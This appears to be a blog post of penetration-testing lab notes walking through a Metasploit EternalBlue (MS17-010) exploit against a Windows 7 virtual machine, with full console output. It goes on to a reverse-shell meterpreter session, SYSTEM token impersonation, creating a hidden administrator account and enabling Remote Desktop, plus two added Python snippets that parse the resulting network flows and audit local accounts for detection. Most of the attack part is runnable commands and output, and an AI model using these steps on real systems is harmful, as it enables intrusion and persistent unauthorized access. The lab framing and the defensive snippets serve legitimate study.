Win7 pentest lab notes

Lab environment:

Target: Win7 (firewall disabled, MS17-010/EternalBlue patch not installed) 192.168.88.135

Attacker machines: Kali 192.168.88.133 (exploitation), Windows 192.168.88.134 (to verify the remote login)

Steps:

  1. Start the Metasploit console with the command msfconsole
  2. Search for the module matching the EternalBlue vulnerability (MS17-010) with the command search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

  3. Select module 2 (exploit/windows/smb/ms17_010_eternalblue) with the command use 2

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

  4. Show the module settings with the command options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

  5. Set the target with the command set rhosts 192.168.88.135

rhosts => 192.168.88.135

  6. Check the settings again with the command options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.135 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

  7. Launch the exploit with the command run

[*] Started reverse TCP handler on 192.168.88.133:4444
[*] 192.168.88.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.88.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.88.135:445 - Connecting to target for exploitation.
[+] 192.168.88.135:445 - Connection established for exploitation.
[+] 192.168.88.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.135:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.88.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.88.135:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.88.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.135:445 - Starting non-paged pool grooming
[+] 192.168.88.135:445 - Sending SMBv2 buffers
[+] 192.168.88.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.135:445 - Sending final SMBv2 buffers.
[*] 192.168.88.135:445 - Sending last fragment of exploit packet!
[*] 192.168.88.135:445 - Receiving response from exploit packet
[+] 192.168.88.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.135:445 - Sending egg to corrupted connection.
[*] 192.168.88.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.88.135
[*] Meterpreter session 1 opened (192.168.88.133:4444 -> 192.168.88.135:49159) at 2022-06-07 23:22:11 -0400
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
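From the responder's side, the transcript above tells you exactly which network evidence the exploit leaves: an SMB connection from the attacker to the target on 445, and a reverse-TCP callback from the target's ephemeral port back to the attacker's listener. The following added example (not part of the original post) parses such a transcript into those flow tuples and a UTC session timestamp; the transcript lines are copied from the walkthrough, the regexes and field names are my own.

```python
import re
from datetime import datetime, timezone

# Constructed sample: lines from the msfconsole run above, as they might be
# recovered from an attacker's shell history during an investigation.
SAMPLE_TRANSCRIPT = """\
[*] Started reverse TCP handler on 192.168.88.133:4444
[*] 192.168.88.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[+] 192.168.88.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (200262 bytes) to 192.168.88.135
[*] Meterpreter session 1 opened (192.168.88.133:4444 -> 192.168.88.135:49159) at 2022-06-07 23:22:11 -0400
"""

HANDLER_RE = re.compile(r"Started reverse TCP handler on (\S+):(\d+)")
CHECK_RE = re.compile(r"\[\+\] (\S+):(\d+) - Host is likely VULNERABLE to (MS17-010)! - (.+)")
STAGE_RE = re.compile(r"Sending stage \((\d+) bytes\) to (\S+)")
SESSION_RE = re.compile(
    r"Meterpreter session (\d+) opened \((\S+):(\d+) -> (\S+):(\d+)\) at (.+)")


def parse_transcript(text):
    """Extract host/port indicators and the two flows a hunter should look for."""
    info = {"flows": []}
    for line in text.splitlines():
        if m := HANDLER_RE.search(line):
            info["attacker"] = (m.group(1), int(m.group(2)))
        elif m := CHECK_RE.search(line):
            info["target"] = (m.group(1), int(m.group(2)))
            info["vuln"], info["os_banner"] = m.group(3), m.group(4)
        elif m := STAGE_RE.search(line):
            info["stage_bytes"] = int(m.group(1))
        elif m := SESSION_RE.search(line):
            # Callback flow: target ephemeral port -> attacker listener (reverse_tcp).
            info["flows"].append((m.group(4), m.group(2), int(m.group(3)), "reverse_tcp_callback"))
            when = datetime.strptime(m.group(6).strip(), "%Y-%m-%d %H:%M:%S %z")
            info["session_opened_utc"] = when.astimezone(timezone.utc).isoformat()
    if "attacker" in info and "target" in info:
        # Exploit flow: attacker -> target SMB (carries both the check and the exploit).
        info["flows"].append((info["attacker"][0], info["target"][0], info["target"][1], "smb_exploit"))
    return info
```

Feed the returned flow tuples (src, dst, dst_port, label) to your NetFlow or firewall-log search; the callback to 4444 from a workstation is the higher-signal one.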

  8. The output ends with "WIN", indicating the exploit succeeded
  9. Load the privilege-escalation (token impersonation) extension with the command use incognito

Loading extension incognito...Success.

  10. List the available tokens with the command list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
yyx-PC\yyx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

  11. Switch to SYSTEM privileges with the command impersonate_token "NT AUTHORITY\SYSTEM"

[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

  12. Drop into a Windows command prompt with the command shell

Process 2924 created.
Channel 2 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

  13. Create a Windows user with the command net user oldboy goodITedu@159 /add (choose your own username and password)

net user oldboy goodITedu@159 /add
命令成功完成。

  14. Check that oldboy now appears in the user list with the command net user

net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator Guest oldboy
test yyx
命令运行完毕，但发生一个或多个错误。

  15. Add it to the local Administrators group with the command net localgroup administrators oldboy /add

net localgroup administrators oldboy /add
命令成功完成。

  16. Check that oldboy is in the local Administrators group with the command net localgroup administrators

net localgroup administrators
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
Administrator
oldboy
test
yyx
命令成功完成。
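Steps 13 to 16 are exactly what a local-account audit should catch: a new account, and the same account joining Administrators. The added example below (mine, not from the original post) parses the `net user` and `net localgroup administrators` output shown above and diffs it against an approved baseline; the baseline sets are constructed for illustration, and the end-of-listing markers cover the Chinese and English locales only.

```python
import re

# Constructed sample: the two command outputs from the walkthrough above, as a
# scheduled audit job would capture them on the Windows 7 host (Chinese locale).
NET_USER_OUTPUT = r"""
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    oldboy
test                     yyx
命令运行完毕，但发生一个或多个错误。
"""

NET_LOCALGROUP_OUTPUT = r"""
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
Administrator
oldboy
test
yyx
命令成功完成。
"""

# Constructed baseline: the accounts that are supposed to exist on this host.
BASELINE_USERS = {"Administrator", "Guest", "test", "yyx"}
BASELINE_ADMINS = {"Administrator", "test", "yyx"}

# First words of the trailer line that ends the listing (English / Chinese locale).
END_MARKERS = ("The command completed", "命令")


def parse_net_names(output):
    """Return the names listed below the dashed separator of `net user` /
    `net localgroup <group>` output. Columns are padded with runs of spaces,
    so split on two or more spaces to keep names containing a single space."""
    names, in_list = [], False
    for line in output.splitlines():
        if re.fullmatch(r"-{10,}", line.strip()):
            in_list = True
            continue
        if not in_list or not line.strip():
            continue
        if line.strip().startswith(END_MARKERS):
            break
        names.extend(re.split(r"\s{2,}", line.strip()))
    return names


def audit_local_accounts(net_user_out, net_localgroup_out, baseline_users, baseline_admins):
    """Report accounts not in the baseline and accounts that gained Administrators."""
    users = set(parse_net_names(net_user_out))
    admins = set(parse_net_names(net_localgroup_out))
    return {
        "new_users": sorted(users - baseline_users),
        "new_admins": sorted(admins - baseline_admins),
        "missing_users": sorted(baseline_users - users),
    }
```

The same event is also visible in the Security log as 4720 (account created) and 4732 (member added to a local group) when account-management auditing is enabled.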

  17. Leave the Windows command prompt with the command exit
  18. Enable Remote Desktop on the target with the command run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]         RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]         The Terminal Services service is not set to auto, changing it to auto ...
[*]         Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20220608003051_default_192.168.88.135_host.windows.cle_785342.txt

  19. Switch to the Windows machine and verify that the remote (RDP) login works.

posted @ 2022-06-08 13:48  singeryoung  Views (224)  Comments (0)